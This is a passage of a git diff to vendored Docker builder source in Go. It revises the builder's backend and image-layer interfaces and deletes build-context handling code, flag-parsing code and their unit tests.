+// ExecBackend contains the interface methods required for executing containers
+type ExecBackend interface {
 	// ContainerAttachRaw attaches to container.
-	ContainerAttachRaw(cID string, stdin io.ReadCloser, stdout, stderr io.Writer, stream bool) error
+	ContainerAttachRaw(cID string, stdin io.ReadCloser, stdout, stderr io.Writer, stream bool, attached chan struct{}) error
 	// ContainerCreate creates a new Docker container and returns potential warnings
 	ContainerCreate(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error)
 	// ContainerRm removes a container specified by `id`.
 	ContainerRm(name string, config *types.ContainerRmConfig) error
-	// Commit creates a new Docker image from an existing Docker container.
-	Commit(string, *backend.ContainerCommitConfig) (string, error)
 	// ContainerKill stops the container execution abruptly.
 	ContainerKill(containerID string, sig uint64) error
 	// ContainerStart starts a new container
 	ContainerStart(containerID string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error
 	// ContainerWait stops processing until the given container is stopped.
-	ContainerWait(containerID string, timeout time.Duration) (int, error)
-	// ContainerUpdateCmdOnBuild updates container.Path and container.Args
-	ContainerUpdateCmdOnBuild(containerID string, cmd []string) error
-	// ContainerCreateWorkdir creates the workdir (currently only used on Windows)
-	ContainerCreateWorkdir(containerID string) error
-
-	// ContainerCopy copies/extracts a source FileInfo to a destination path inside a container
-	// specified by a container object.
-	// TODO: make an Extract method instead of passing `decompress`
-	// TODO: do not pass a FileInfo, instead refactor the archive package to export a Walk function that can be used
-	// with Context.Walk
-	// ContainerCopy(name string, res string) (io.ReadCloser, error)
-	// TODO: use copyBackend api
-	CopyOnBuild(containerID string, destPath string, src FileInfo, decompress bool) error
-
-	// HasExperimental checks if the backend supports experimental features
-	HasExperimental() bool
-
-	// SquashImage squashes the fs layers from the provided image down to the specified `to` image
-	SquashImage(from string, to string) (string, error)
+	ContainerWait(ctx context.Context, name string, condition containerpkg.WaitCondition) (<-chan containerpkg.StateStatus, error)
 }
 
-// Image represents a Docker image used by the builder.
-type Image interface {
-	ImageID() string
-	RunConfig() *container.Config
+// Result is the output produced by a Builder
+type Result struct {
+	ImageID   string
+	FromImage Image
 }
 
 // ImageCacheBuilder represents a generator for stateful image cache.
@@ -163,7 +87,29 @@ type ImageCacheBuilder interface {
 // ImageCache abstracts an image cache.
 // (parent image, child runconfig) -> child image
 type ImageCache interface {
-	// GetCachedImageOnBuild returns a reference to a cached image whose parent equals `parent`
+	// GetCache returns a reference to a cached image whose parent equals `parent`
 	// and runconfig equals `cfg`. A cache miss is expected to return an empty ID and a nil error.
 	GetCache(parentID string, cfg *container.Config) (imageID string, err error)
 }
+
+// Image represents a Docker image used by the builder.
+type Image interface {
+	ImageID() string
+	RunConfig() *container.Config
+	MarshalJSON() ([]byte, error)
+	OperatingSystem() string
+}
+
+// ROLayer is a reference to image rootfs layer
+type ROLayer interface {
+	Release() error
+	NewRWLayer() (RWLayer, error)
+	DiffID() layer.DiffID
+}
+
+// RWLayer is active layer that can be read/modified
+type RWLayer interface {
+	Release() error
+	Root() containerfs.ContainerFS
+	Commit() (ROLayer, error)
+}
diff --git a/vendor/github.com/docker/docker/builder/context.go b/vendor/github.com/docker/docker/builder/context.go
deleted file mode 100644
index 600f42319b..0000000000
--- a/vendor/github.com/docker/docker/builder/context.go
+++ /dev/null
@@ -1,260 +0,0 @@
-package builder
-
-import (
-	"bufio"
-	"fmt"
-	"io"
-	"io/ioutil"
-	"os"
-	"os/exec"
-	"path/filepath"
-	"runtime"
-	"strings"
-
-	"github.com/docker/docker/pkg/archive"
-	"github.com/docker/docker/pkg/fileutils"
-	"github.com/docker/docker/pkg/gitutils"
-	"github.com/docker/docker/pkg/httputils"
-	"github.com/docker/docker/pkg/ioutils"
-	"github.com/docker/docker/pkg/progress"
-	"github.com/docker/docker/pkg/streamformatter"
-)
-
-// ValidateContextDirectory checks if all the contents of the directory
-// can be read and returns an error if some files can't be read
-// symlinks which point to non-existing files don't trigger an error
-func ValidateContextDirectory(srcPath string, excludes []string) error {
-	contextRoot, err := getContextRoot(srcPath)
-	if err != nil {
-		return err
-	}
-	return filepath.Walk(contextRoot, func(filePath string, f os.FileInfo, err error) error {
-		if err != nil {
-			if os.IsPermission(err) {
-				return fmt.Errorf("can't stat '%s'", filePath)
-			}
-			if os.IsNotExist(err) {
-				return nil
-			}
-			return err
-		}
-
-		// skip this directory/file if it's not in the path, it won't get added to the context
-		if relFilePath, err := filepath.Rel(contextRoot, filePath); err != nil {
-			return err
-		} else if skip, err := fileutils.Matches(relFilePath, excludes); err != nil {
-			return err
-		} else if skip {
-			if f.IsDir() {
-				return filepath.SkipDir
-			}
-			return nil
-		}
-
-		// skip checking if symlinks point to non-existing files, such symlinks can be useful
-		// also skip named pipes, because they hanging on open
-		if f.Mode()&(os.ModeSymlink|os.ModeNamedPipe) != 0 {
-			return nil
-		}
-
-		if !f.IsDir() {
-			currentFile, err := os.Open(filePath)
-			if err != nil && os.IsPermission(err) {
-				return fmt.Errorf("no permission to read from '%s'", filePath)
-			}
-			currentFile.Close()
-		}
-		return nil
-	})
-}
-
-// GetContextFromReader will read the contents of the given reader as either a
-// Dockerfile or tar archive. Returns a tar archive used as a context and a
-// path to the Dockerfile inside the tar.
-func GetContextFromReader(r io.ReadCloser, dockerfileName string) (out io.ReadCloser, relDockerfile string, err error) {
-	buf := bufio.NewReader(r)
-
-	magic, err := buf.Peek(archive.HeaderSize)
-	if err != nil && err != io.EOF {
-		return nil, "", fmt.Errorf("failed to peek context header from STDIN: %v", err)
-	}
-
-	if archive.IsArchive(magic) {
-		return ioutils.NewReadCloserWrapper(buf, func() error { return r.Close() }), dockerfileName, nil
-	}
-
-	// Input should be read as a Dockerfile.
-	tmpDir, err := ioutil.TempDir("", "docker-build-context-")
-	if err != nil {
-		return nil, "", fmt.Errorf("unbale to create temporary context directory: %v", err)
-	}
-
-	f, err := os.Create(filepath.Join(tmpDir, DefaultDockerfileName))
-	if err != nil {
-		return nil, "", err
-	}
-	_, err = io.Copy(f, buf)
-	if err != nil {
-		f.Close()
-		return nil, "", err
-	}
-
-	if err := f.Close(); err != nil {
-		return nil, "", err
-	}
-	if err := r.Close(); err != nil {
-		return nil, "", err
-	}
-
-	tar, err := archive.Tar(tmpDir, archive.Uncompressed)
-	if err != nil {
-		return nil, "", err
-	}
-
-	return ioutils.NewReadCloserWrapper(tar, func() error {
-		err := tar.Close()
-		os.RemoveAll(tmpDir)
-		return err
-	}), DefaultDockerfileName, nil
-
-}
-
-// GetContextFromGitURL uses a Git URL as context for a `docker build`. The
-// git repo is cloned into a temporary directory used as the context directory.
-// Returns the absolute path to the temporary context directory, the relative
-// path of the dockerfile in that context directory, and a non-nil error on
-// success.
-func GetContextFromGitURL(gitURL, dockerfileName string) (absContextDir, relDockerfile string, err error) {
-	if _, err := exec.LookPath("git"); err != nil {
-		return "", "", fmt.Errorf("unable to find 'git': %v", err)
-	}
-	if absContextDir, err = gitutils.Clone(gitURL); err != nil {
-		return "", "", fmt.Errorf("unable to 'git clone' to temporary context directory: %v", err)
-	}
-
-	return getDockerfileRelPath(absContextDir, dockerfileName)
-}
-
-// GetContextFromURL uses a remote URL as context for a `docker build`. The
-// remote resource is downloaded as either a Dockerfile or a tar archive.
-// Returns the tar archive used for the context and a path of the
-// dockerfile inside the tar.
-func GetContextFromURL(out io.Writer, remoteURL, dockerfileName string) (io.ReadCloser, string, error) {
-	response, err := httputils.Download(remoteURL)
-	if err != nil {
-		return nil, "", fmt.Errorf("unable to download remote context %s: %v", remoteURL, err)
-	}
-	progressOutput := streamformatter.NewStreamFormatter().NewProgressOutput(out, true)
-
-	// Pass the response body through a progress reader.
-	progReader := progress.NewProgressReader(response.Body, progressOutput, response.ContentLength, "", fmt.Sprintf("Downloading build context from remote url: %s", remoteURL))
-
-	return GetContextFromReader(ioutils.NewReadCloserWrapper(progReader, func() error { return response.Body.Close() }), dockerfileName)
-}
-
-// GetContextFromLocalDir uses the given local directory as context for a
-// `docker build`. Returns the absolute path to the local context directory,
-// the relative path of the dockerfile in that context directory, and a non-nil
-// error on success.
-func GetContextFromLocalDir(localDir, dockerfileName string) (absContextDir, relDockerfile string, err error) {
-	// When using a local context directory, when the Dockerfile is specified
-	// with the `-f/--file` option then it is considered relative to the
-	// current directory and not the context directory.
-	if dockerfileName != "" {
-		if dockerfileName, err = filepath.Abs(dockerfileName); err != nil {
-			return "", "", fmt.Errorf("unable to get absolute path to Dockerfile: %v", err)
-		}
-	}
-
-	return getDockerfileRelPath(localDir, dockerfileName)
-}
-
-// getDockerfileRelPath uses the given context directory for a `docker build`
-// and returns the absolute path to the context directory, the relative path of
-// the dockerfile in that context directory, and a non-nil error on success.
-func getDockerfileRelPath(givenContextDir, givenDockerfile string) (absContextDir, relDockerfile string, err error) {
-	if absContextDir, err = filepath.Abs(givenContextDir); err != nil {
-		return "", "", fmt.Errorf("unable to get absolute context directory of given context directory %q: %v", givenContextDir, err)
-	}
-
-	// The context dir might be a symbolic link, so follow it to the actual
-	// target directory.
-	//
-	// FIXME. We use isUNC (always false on non-Windows platforms) to workaround
-	// an issue in golang. On Windows, EvalSymLinks does not work on UNC file
-	// paths (those starting with \\). This hack means that when using links
-	// on UNC paths, they will not be followed.
-	if !isUNC(absContextDir) {
-		absContextDir, err = filepath.EvalSymlinks(absContextDir)
-		if err != nil {
-			return "", "", fmt.Errorf("unable to evaluate symlinks in context path: %v", err)
-		}
-	}
-
-	stat, err := os.Lstat(absContextDir)
-	if err != nil {
-		return "", "", fmt.Errorf("unable to stat context directory %q: %v", absContextDir, err)
-	}
-
-	if !stat.IsDir() {
-		return "", "", fmt.Errorf("context must be a directory: %s", absContextDir)
-	}
-
-	absDockerfile := givenDockerfile
-	if absDockerfile == "" {
-		// No -f/--file was specified so use the default relative to the
-		// context directory.
-		absDockerfile = filepath.Join(absContextDir, DefaultDockerfileName)
-
-		// Just to be nice ;-) look for 'dockerfile' too but only
-		// use it if we found it, otherwise ignore this check
-		if _, err = os.Lstat(absDockerfile); os.IsNotExist(err) {
-			altPath := filepath.Join(absContextDir, strings.ToLower(DefaultDockerfileName))
-			if _, err = os.Lstat(altPath); err == nil {
-				absDockerfile = altPath
-			}
-		}
-	}
-
-	// If not already an absolute path, the Dockerfile path should be joined to
-	// the base directory.
-	if !filepath.IsAbs(absDockerfile) {
-		absDockerfile = filepath.Join(absContextDir, absDockerfile)
-	}
-
-	// Evaluate symlinks in the path to the Dockerfile too.
-	//
-	// FIXME. We use isUNC (always false on non-Windows platforms) to workaround
-	// an issue in golang. On Windows, EvalSymLinks does not work on UNC file
-	// paths (those starting with \\). This hack means that when using links
-	// on UNC paths, they will not be followed.
-	if !isUNC(absDockerfile) {
-		absDockerfile, err = filepath.EvalSymlinks(absDockerfile)
-		if err != nil {
-			return "", "", fmt.Errorf("unable to evaluate symlinks in Dockerfile path: %v", err)
-		}
-	}
-
-	if _, err := os.Lstat(absDockerfile); err != nil {
-		if os.IsNotExist(err) {
-			return "", "", fmt.Errorf("Cannot locate Dockerfile: %q", absDockerfile)
-		}
-		return "", "", fmt.Errorf("unable to stat Dockerfile: %v", err)
-	}
-
-	if relDockerfile, err = filepath.Rel(absContextDir, absDockerfile); err != nil {
-		return "", "", fmt.Errorf("unable to get relative Dockerfile path: %v", err)
-	}
-
-	if strings.HasPrefix(relDockerfile, ".."+string(filepath.Separator)) {
-		return "", "", fmt.Errorf("The Dockerfile (%s) must be within the build context (%s)", givenDockerfile, givenContextDir)
-	}
-
-	return absContextDir, relDockerfile, nil
-}
-
-// isUNC returns true if the path is UNC (one starting \\). It always returns
-// false on Linux.
-func isUNC(path string) bool {
-	return runtime.GOOS == "windows" && strings.HasPrefix(path, `\\`)
-}
diff --git a/vendor/github.com/docker/docker/builder/context_test.go b/vendor/github.com/docker/docker/builder/context_test.go
deleted file mode 100644
index 27d29d79f4..0000000000
--- a/vendor/github.com/docker/docker/builder/context_test.go
+++ /dev/null
@@ -1,307 +0,0 @@
-package builder
-
-import (
-	"archive/tar"
-	"bytes"
-	"io"
-	"io/ioutil"
-	"path/filepath"
-	"runtime"
-	"strings"
-	"testing"
-
-	"github.com/docker/docker/pkg/archive"
-)
-
-var prepareEmpty = func(t *testing.T) (string, func()) {
-	return "", func() {}
-}
-
-var prepareNoFiles = func(t *testing.T) (string, func()) {
-	return createTestTempDir(t, "", "builder-context-test")
-}
-
-var prepareOneFile = func(t *testing.T) (string, func()) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
-	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
-	return contextDir, cleanup
-}
-
-func testValidateContextDirectory(t *testing.T, prepare func(t *testing.T) (string, func()), excludes []string) {
-	contextDir, cleanup := prepare(t)
-	defer cleanup()
-
-	err := ValidateContextDirectory(contextDir, excludes)
-
-	if err != nil {
-		t.Fatalf("Error should be nil, got: %s", err)
-	}
-}
-
-func TestGetContextFromLocalDirNoDockerfile(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
-	defer cleanup()
-
-	absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, "")
-
-	if err == nil {
-		t.Fatalf("Error should not be nil")
-	}
-
-	if absContextDir != "" {
-		t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir)
-	}
-
-	if relDockerfile != "" {
-		t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile)
-	}
-}
-
-func TestGetContextFromLocalDirNotExistingDir(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
-	defer cleanup()
-
-	fakePath := filepath.Join(contextDir, "fake")
-
-	absContextDir, relDockerfile, err := GetContextFromLocalDir(fakePath, "")
-
-	if err == nil {
-		t.Fatalf("Error should not be nil")
-	}
-
-	if absContextDir != "" {
-		t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir)
-	}
-
-	if relDockerfile != "" {
-		t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile)
-	}
-}
-
-func TestGetContextFromLocalDirNotExistingDockerfile(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
-	defer cleanup()
-
-	fakePath := filepath.Join(contextDir, "fake")
-
-	absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, fakePath)
-
-	if err == nil {
-		t.Fatalf("Error should not be nil")
-	}
-
-	if absContextDir != "" {
-		t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir)
-	}
-
-	if relDockerfile != "" {
-		t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile)
-	}
-}
-
-func TestGetContextFromLocalDirWithNoDirectory(t *testing.T) {
-	contextDir, dirCleanup := createTestTempDir(t, "", "builder-context-test")
-	defer dirCleanup()
-
-	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
-
-	chdirCleanup := chdir(t, contextDir)
-	defer chdirCleanup()
-
-	absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, "")
-
-	if err != nil {
-		t.Fatalf("Error when getting context from local dir: %s", err)
-	}
-
-	if absContextDir != contextDir {
-		t.Fatalf("Absolute directory path should be equal to %s, got: %s", contextDir, absContextDir)
-	}
-
-	if relDockerfile != DefaultDockerfileName {
-		t.Fatalf("Relative path to dockerfile should be equal to %s, got: %s", DefaultDockerfileName, relDockerfile)
-	}
-}
-
-func TestGetContextFromLocalDirWithDockerfile(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
-	defer cleanup()
-
-	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
-
-	absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, "")
-
-	if err != nil {
-		t.Fatalf("Error when getting context from local dir: %s", err)
-	}
-
-	if absContextDir != contextDir {
-		t.Fatalf("Absolute directory path should be equal to %s, got: %s", contextDir, absContextDir)
-	}
-
-	if relDockerfile != DefaultDockerfileName {
-		t.Fatalf("Relative path to dockerfile should be equal to %s, got: %s", DefaultDockerfileName, relDockerfile)
-	}
-}
-
-func TestGetContextFromLocalDirLocalFile(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
-	defer cleanup()
-
-	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
-	testFilename := createTestTempFile(t, contextDir, "tmpTest", "test", 0777)
-
-	absContextDir, relDockerfile, err := GetContextFromLocalDir(testFilename, "")
-
-	if err == nil {
-		t.Fatalf("Error should not be nil")
-	}
-
-	if absContextDir != "" {
-		t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir)
-	}
-
-	if relDockerfile != "" {
-		t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile)
-	}
-}
-
-func TestGetContextFromLocalDirWithCustomDockerfile(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
-	defer cleanup()
-
-	chdirCleanup := chdir(t, contextDir)
-	defer chdirCleanup()
-
-	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
-
-	absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, DefaultDockerfileName)
-
-	if err != nil {
-		t.Fatalf("Error when getting context from local dir: %s", err)
-	}
-
-	if absContextDir != contextDir {
-		t.Fatalf("Absolute directory path should be equal to %s, got: %s", contextDir, absContextDir)
-	}
-
-	if relDockerfile != DefaultDockerfileName {
-		t.Fatalf("Relative path to dockerfile should be equal to %s, got: %s", DefaultDockerfileName, relDockerfile)
-	}
-
-}
-
-func TestGetContextFromReaderString(t *testing.T) {
-	tarArchive, relDockerfile, err := GetContextFromReader(ioutil.NopCloser(strings.NewReader(dockerfileContents)), "")
-
-	if err != nil {
-		t.Fatalf("Error when executing GetContextFromReader: %s", err)
-	}
-
-	tarReader := tar.NewReader(tarArchive)
-
-	_, err = tarReader.Next()
-
-	if err != nil {
-		t.Fatalf("Error when reading tar archive: %s", err)
-	}
-
-	buff := new(bytes.Buffer)
-	buff.ReadFrom(tarReader)
-	contents := buff.String()
-
-	_, err = tarReader.Next()
-
-	if err != io.EOF {
-		t.Fatalf("Tar stream too long: %s", err)
-	}
-
-	if err = tarArchive.Close(); err != nil {
-		t.Fatalf("Error when closing tar stream: %s", err)
-	}
-
-	if dockerfileContents != contents {
-		t.Fatalf("Uncompressed tar archive does not equal: %s, got: %s", dockerfileContents, contents)
-	}
-
-	if relDockerfile != DefaultDockerfileName {
-		t.Fatalf("Relative path not equals %s, got: %s", DefaultDockerfileName, relDockerfile)
-	}
-}
-
-func TestGetContextFromReaderTar(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
-	defer cleanup()
-
-	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
-
-	tarStream, err := archive.Tar(contextDir, archive.Uncompressed)
-
-	if err != nil {
-		t.Fatalf("Error when creating tar: %s", err)
-	}
-
-	tarArchive, relDockerfile, err := GetContextFromReader(tarStream, DefaultDockerfileName)
-
-	if err != nil {
-		t.Fatalf("Error when executing GetContextFromReader: %s", err)
-	}
-
-	tarReader := tar.NewReader(tarArchive)
-
-	header, err := tarReader.Next()
-
-	if err != nil {
-		t.Fatalf("Error when reading tar archive: %s", err)
-	}
-
-	if header.Name != DefaultDockerfileName {
-		t.Fatalf("Dockerfile name should be: %s, got: %s", DefaultDockerfileName, header.Name)
-	}
-
-	buff := new(bytes.Buffer)
-	buff.ReadFrom(tarReader)
-	contents := buff.String()
-
-	_, err = tarReader.Next()
-
-	if err != io.EOF {
-		t.Fatalf("Tar stream too long: %s", err)
-	}
-
-	if err = tarArchive.Close(); err != nil {
-		t.Fatalf("Error when closing tar stream: %s", err)
-	}
-
-	if dockerfileContents != contents {
-		t.Fatalf("Uncompressed tar archive does not equal: %s, got: %s", dockerfileContents, contents)
-	}
-
-	if relDockerfile != DefaultDockerfileName {
-		t.Fatalf("Relative path not equals %s, got: %s", DefaultDockerfileName, relDockerfile)
-	}
-}
-
-func TestValidateContextDirectoryEmptyContext(t *testing.T) {
-	// This isn't a valid test on Windows. See https://play.golang.org/p/RR6z6jxR81.
-	// The test will ultimately end up calling filepath.Abs(""). On Windows,
-	// golang will error. On Linux, golang will return /. Due to there being
-	// drive letters on Windows, this is probably the correct behaviour for
-	// Windows.
-	if runtime.GOOS == "windows" {
-		t.Skip("Invalid test on Windows")
-	}
-	testValidateContextDirectory(t, prepareEmpty, []string{})
-}
-
-func TestValidateContextDirectoryContextWithNoFiles(t *testing.T) {
-	testValidateContextDirectory(t, prepareNoFiles, []string{})
-}
-
-func TestValidateContextDirectoryWithOneFile(t *testing.T) {
-	testValidateContextDirectory(t, prepareOneFile, []string{})
-}
-
-func TestValidateContextDirectoryWithOneFileExcludes(t *testing.T) {
-	testValidateContextDirectory(t, prepareOneFile, []string{DefaultDockerfileName})
-}
diff --git a/vendor/github.com/docker/docker/builder/context_unix.go b/vendor/github.com/docker/docker/builder/context_unix.go
deleted file mode 100644
index d1f72e0573..0000000000
--- a/vendor/github.com/docker/docker/builder/context_unix.go
+++ /dev/null
@@ -1,11 +0,0 @@
-// +build !windows
-
-package builder
-
-import (
-	"path/filepath"
-)
-
-func getContextRoot(srcPath string) (string, error) {
-	return filepath.Join(srcPath, "."), nil
-}
diff --git a/vendor/github.com/docker/docker/builder/context_windows.go b/vendor/github.com/docker/docker/builder/context_windows.go
deleted file mode 100644
index b8ba2ba231..0000000000
--- a/vendor/github.com/docker/docker/builder/context_windows.go
+++ /dev/null
@@ -1,17 +0,0 @@
-// +build windows
-
-package builder
-
-import (
-	"path/filepath"
-
-	"github.com/docker/docker/pkg/longpath"
-)
-
-func getContextRoot(srcPath string) (string, error) {
-	cr, err := filepath.Abs(srcPath)
-	if err != nil {
-		return "", err
-	}
-	return longpath.AddPrefix(cr), nil
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/bflag.go b/vendor/github.com/docker/docker/builder/dockerfile/bflag.go
deleted file mode 100644
index 1e03693072..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/bflag.go
+++ /dev/null
@@ -1,176 +0,0 @@
-package dockerfile
-
-import (
-	"fmt"
-	"strings"
-)
-
-// FlagType is the type of the build flag
-type FlagType int
-
-const (
-	boolType FlagType = iota
-	stringType
-)
-
-// BFlags contains all flags information for the builder
-type BFlags struct {
-	Args  []string // actual flags/args from cmd line
-	flags map[string]*Flag
-	used  map[string]*Flag
-	Err   error
-}
-
-// Flag contains all information for a flag
-type Flag struct {
-	bf       *BFlags
-	name     string
-	flagType FlagType
-	Value    string
-}
-
-// NewBFlags returns the new BFlags struct
-func NewBFlags() *BFlags {
-	return &BFlags{
-		flags: make(map[string]*Flag),
-		used:  make(map[string]*Flag),
-	}
-}
-
-// AddBool adds a bool flag to BFlags
-// Note, any error will be generated when Parse() is called (see Parse).
-func (bf *BFlags) AddBool(name string, def bool) *Flag {
-	flag := bf.addFlag(name, boolType)
-	if flag == nil {
-		return nil
-	}
-	if def {
-		flag.Value = "true"
-	} else {
-		flag.Value = "false"
-	}
-	return flag
-}
-
-// AddString adds a string flag to BFlags
-// Note, any error will be generated when Parse() is called (see Parse).
-func (bf *BFlags) AddString(name string, def string) *Flag {
-	flag := bf.addFlag(name, stringType)
-	if flag == nil {
-		return nil
-	}
-	flag.Value = def
-	return flag
-}
-
-// addFlag is a generic func used by the other AddXXX() func
-// to add a new flag to the BFlags struct.
-// Note, any error will be generated when Parse() is called (see Parse).
-func (bf *BFlags) addFlag(name string, flagType FlagType) *Flag {
-	if _, ok := bf.flags[name]; ok {
-		bf.Err = fmt.Errorf("Duplicate flag defined: %s", name)
-		return nil
-	}
-
-	newFlag := &Flag{
-		bf:       bf,
-		name:     name,
-		flagType: flagType,
-	}
-	bf.flags[name] = newFlag
-
-	return newFlag
-}
-
-// IsUsed checks if the flag is used
-func (fl *Flag) IsUsed() bool {
-	if _, ok := fl.bf.used[fl.name]; ok {
-		return true
-	}
-	return false
-}
-
-// IsTrue checks if a bool flag is true
-func (fl *Flag) IsTrue() bool {
-	if fl.flagType != boolType {
-		// Should never get here
-		panic(fmt.Errorf("Trying to use IsTrue on a non-boolean: %s", fl.name))
-	}
-	return fl.Value == "true"
-}
-
-// Parse parses and checks if the BFlags is valid.
-// Any error noticed during the AddXXX() funcs will be generated/returned
-// here.  We do this because an error during AddXXX() is more like a
-// compile time error so it doesn't matter too much when we stop our
-// processing as long as we do stop it, so this allows the code
-// around AddXXX() to be just:
-//     defFlag := AddString("description", "")
-// w/o needing to add an if-statement around each one.
-func (bf *BFlags) Parse() error {
-	// If there was an error while defining the possible flags
-	// go ahead and bubble it back up here since we didn't do it
-	// earlier in the processing
-	if bf.Err != nil {
-		return fmt.Errorf("Error setting up flags: %s", bf.Err)
-	}
-
-	for _, arg := range bf.Args {
-		if !strings.HasPrefix(arg, "--") {
-			return fmt.Errorf("Arg should start with -- : %s", arg)
-		}
-
-		if arg == "--" {
-			return nil
-		}
-
-		arg = arg[2:]
-		value := ""
-
-		index := strings.Index(arg, "=")
-		if index >= 0 {
-			value = arg[index+1:]
-			arg = arg[:index]
-		}
-
-		flag, ok := bf.flags[arg]
-		if !ok {
-			return fmt.Errorf("Unknown flag: %s", arg)
-		}
-
-		if _, ok = bf.used[arg]; ok {
-			return fmt.Errorf("Duplicate flag specified: %s", arg)
-		}
-
-		bf.used[arg] = flag
-
-		switch flag.flagType {
-		case boolType:
-			// value == "" is only ok if no "=" was specified
-			if index >= 0 && value == "" {
-				return fmt.Errorf("Missing a value on flag: %s", arg)
-			}
-
-			lower := strings.ToLower(value)
-			if lower == "" {
-				flag.Value = "true"
-			} else if lower == "true" || lower == "false" {
-				flag.Value = lower
-			} else {
-				return fmt.Errorf("Expecting boolean value for flag %s, not: %s", arg, value)
-			}
-
-		case stringType:
-			if index < 0 {
-				return fmt.Errorf("Missing a value on flag: %s", arg)
-			}
-			flag.Value = value
-
-		default:
-			panic(fmt.Errorf("No idea what kind of flag we have! Should never get here!"))
-		}
-
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go b/vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go
deleted file mode 100644
index 65cfceadd0..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go
+++ /dev/null
@@ -1,187 +0,0 @@
-package dockerfile
-
-import (
-	"testing"
-)
-
-func TestBuilderFlags(t *testing.T) {
-	var expected string
-	var err error
-
-	// ---
-
-	bf := NewBFlags()
-	bf.Args = []string{}
-	if err := bf.Parse(); err != nil {
-		t.Fatalf("Test1 of %q was supposed to work: %s", bf.Args, err)
-	}
-
-	// ---
-
-	bf = NewBFlags()
-	bf.Args = []string{"--"}
-	if err := bf.Parse(); err != nil {
-		t.Fatalf("Test2 of %q was supposed to work: %s", bf.Args, err)
-	}
-
-	// ---
-
-	bf = NewBFlags()
-	flStr1 := bf.AddString("str1", "")
-	flBool1 := bf.AddBool("bool1", false)
-	bf.Args = []string{}
-	if err = bf.Parse(); err != nil {
-		t.Fatalf("Test3 of %q was supposed to work: %s", bf.Args, err)
-	}
-
-	if flStr1.IsUsed() == true {
-		t.Fatalf("Test3 - str1 was not used!")
-	}
-	if flBool1.IsUsed() == true {
-		t.Fatalf("Test3 - bool1 was not used!")
-	}
-
-	// ---
-
-	bf = NewBFlags()
-	flStr1 = bf.AddString("str1", "HI")
-	flBool1 = bf.AddBool("bool1", false)
-	bf.Args = []string{}
-
-	if err = bf.Parse(); err != nil {
-		t.Fatalf("Test4 of %q was supposed to work: %s", bf.Args, err)
-	}
-
-	if flStr1.Value != "HI" {
-		t.Fatalf("Str1 was supposed to default to: HI")
-	}
-	if flBool1.IsTrue() {
-		t.Fatalf("Bool1 was supposed to default to: false")
-	}
-	if flStr1.IsUsed() == true {
-		t.Fatalf("Str1 was not used!")
-	}
-	if flBool1.IsUsed() == true {
-		t.Fatalf("Bool1 was not used!")
-	}
-
-	// ---
-
-	bf = NewBFlags()
-	flStr1 = bf.AddString("str1", "HI")
-	bf.Args = []string{"--str1"}
-
-	if err = bf.Parse(); err == nil {
-		t.Fatalf("Test %q was supposed to fail", bf.Args)
-	}
-
-	// ---
-
-	bf = NewBFlags()
-	flStr1 = bf.AddString("str1", "HI")
-	bf.Args = []string{"--str1="}
-
-	if err = bf.Parse(); err != nil {
-		t.Fatalf("Test %q was supposed to work: %s", bf.Args, err)
-	}
-
-	expected = ""
-	if flStr1.Value != expected {
-		t.Fatalf("Str1 (%q) should be: %q", flStr1.Value, expected)
-	}
-
-	// ---
-
-	bf = NewBFlags()
-	flStr1 = bf.AddString("str1", "HI")
-	bf.Args = []string{"--str1=BYE"}
-
-	if err = bf.Parse(); err != nil {
-		t.Fatalf("Test %q was supposed to work: %s", bf.Args, err)
-	}
-
-	expected = "BYE"
-	if flStr1.Value != expected {
-		t.Fatalf("Str1 (%q) should be: %q", flStr1.Value, expected)
-	}
-
-	// ---
-
-	bf = NewBFlags()
-	flBool1 = bf.AddBool("bool1", false)
-	bf.Args = []string{"--bool1"}
-
-	if err = bf.Parse(); err != nil {
-		t.Fatalf("Test %q was supposed to work: %s", bf.Args, err)
-	}
-
-	if !flBool1.IsTrue() {
-		t.Fatalf("Test-b1 Bool1 was supposed to be true")
-	}
-
-	// ---
-
-	bf = NewBFlags()
-	flBool1 = bf.AddBool("bool1", false)
-	bf.Args = []string{"--bool1=true"}
-
-	if err = bf.Parse(); err != nil {
-		t.Fatalf("Test %q was supposed to work: %s", bf.Args, err)
-	}
-
-	if !flBool1.IsTrue() {
-		t.Fatalf("Test-b2 Bool1 was supposed to be true")
-	}
-
-	// ---
-
-	bf = NewBFlags()
-	flBool1 = bf.AddBool("bool1", false)
-	bf.Args = []string{"--bool1=false"}
-
